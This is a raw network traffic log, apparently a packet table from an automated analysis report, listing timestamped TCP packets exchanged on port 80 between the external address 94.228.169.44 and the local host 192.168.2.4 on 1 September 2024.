Sep 1, 2024 18:27:46.077198029 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.077210903 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.077236891 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.078222990 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.078265905 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.078284025 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.078330040 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.078371048 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.082757950 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.082874060 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.082933903 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.085385084 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.085460901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.085473061 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.085509062 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.089011908 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.089083910 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.089122057 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.090135098 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.090177059 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.090301037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.091793060 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.091835022 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.091952085 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.094299078 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.094340086 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.094508886 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.095736980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.095781088 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.095868111 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.097742081 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.097754002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.097779989 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.099773884 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.099828005 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.099847078 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.103950977 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.103995085 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.104073048 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.106389999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.106435061 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.106494904 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.107570887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.107610941 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.107714891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.109602928 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.109648943 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.109668970 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.109783888 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.109838009 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.109915972 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.110730886 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.110768080 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.110773087 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.112521887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.112560034 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.112586975 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.114312887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.114325047 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.114363909 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.115870953 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.115910053 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.115931988 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.117548943 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.117590904 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.117803097 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.119307041 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.119352102 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.119364023 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.121114016 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.121160030 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.121172905 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.122389078 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.122432947 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.122458935 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.125009060 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.125019073 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.125057936 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.126152992 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.126198053 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.126219988 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.127521992 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.127564907 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.127582073 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.129276991 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.129323959 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.129331112 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.130762100 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.130804062 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.130820036 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.131798029 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.131860018 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.131908894 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.133342981 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.133380890 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.133387089 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.134798050 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.134843111 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.134869099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.136142015 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.136184931 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.136224985 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.136234999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.136269093 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.137566090 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.137651920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.137695074 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.139050007 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.139177084 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.139221907 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.140563011 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.140580893 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.140619993 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.141936064 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.141971111 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.142009020 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.142028093 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.143311024 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.143354893 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.143371105 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.144963980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.145009995 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.145020008 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.146138906 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.146162987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.146182060 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.147564888 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.147607088 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.147634983 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.149033070 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.149043083 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.149087906 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.149092913 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.149144888 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.150578976 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.150656939 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.150705099 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.152127028 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.152163029 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.152204990 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.153106928 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.153173923 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.153217077 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.154491901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.154546976 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.154589891 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.155678034 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.155711889 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.155754089 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.155800104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.156989098 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.157031059 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.157032967 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.158360958 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.158402920 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.158437014 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.159471989 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.159482956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.159517050 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.160715103 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.160763025 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.160789013 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.161863089 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.161895037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.161900997 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.163189888 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.163199902 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.163238049 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.163239956 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.163274050 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.164510012 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.164592028 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.164630890 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.165738106 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.165795088 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.165815115 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.165844917 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.166819096 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.166863918 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.166897058 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.167893887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.167941093 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.167944908 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.171462059 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.171509981 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.171541929 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.171554089 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.171591043 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.171644926 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.177643061 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.177670956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.177683115 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.177704096 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.177721024 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.177783966 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.177887917 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.177927017 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.177954912 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.177966118 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.178006887 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.182518005 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.182532072 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.182580948 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.182595968 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.182656050 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.182667017 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.182699919 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.182813883 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.182826042 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.182857990 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.188460112 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.188469887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.188486099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.188523054 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.188539982 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.188599110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.188610077 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.188621044 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.188648939 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.188910961 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.188920975 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.188954115 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.196115017 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.196176052 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.196197033 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.196208000 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.196253061 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.196398020 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.196408987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.196419001 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.196429968 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.196458101 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.196487904 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.201137066 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.201178074 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.201188087 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.201210022 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.202451944 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.202496052 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.202511072 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.202521086 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.202557087 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.202642918 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.202652931 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.202687025 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.206053019 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.206094027 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.206140041 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.206175089 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.206264973 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.206275940 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.206288099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.206305981 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.206327915 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.206639051 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.206686020 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.206728935 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.214129925 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.214210033 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.214221001 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.214261055 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.214342117 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.214385033 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.214404106 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.214418888 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.214430094 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.214454889 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.218398094 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.218451977 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.218522072 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.218533039 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.218570948 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.218669891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.218681097 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.218691111 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.218703032 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.218714952 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.218733072 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.221951008 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.221960068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.221998930 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.222043037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.222110033 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.222121000 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.222152948 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.222256899 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.222268105 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.222276926 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.222301006 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.222317934 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.229363918 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.229429960 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.229439974 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.229475975 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.229496002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.229535103 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.229623079 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.229635000 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.229669094 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.229813099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.229824066 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.229861021 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.231898069 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.231988907 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.232003927 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.232033968 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.232137918 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.232147932 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.232178926 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.232302904 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.232343912 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.232373953 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.237602949 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.237644911 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.237646103 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.237654924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.237690926 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.237767935 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.237827063 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.237868071 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.237915039 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.237989902 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.237999916 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.238033056 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.238091946 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.238136053 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.241662979 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.241672993 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.241683960 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.241712093 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.241785049 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.241796017 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.241823912 CEST	56160	80	192.168.2.4	94.228.169.44
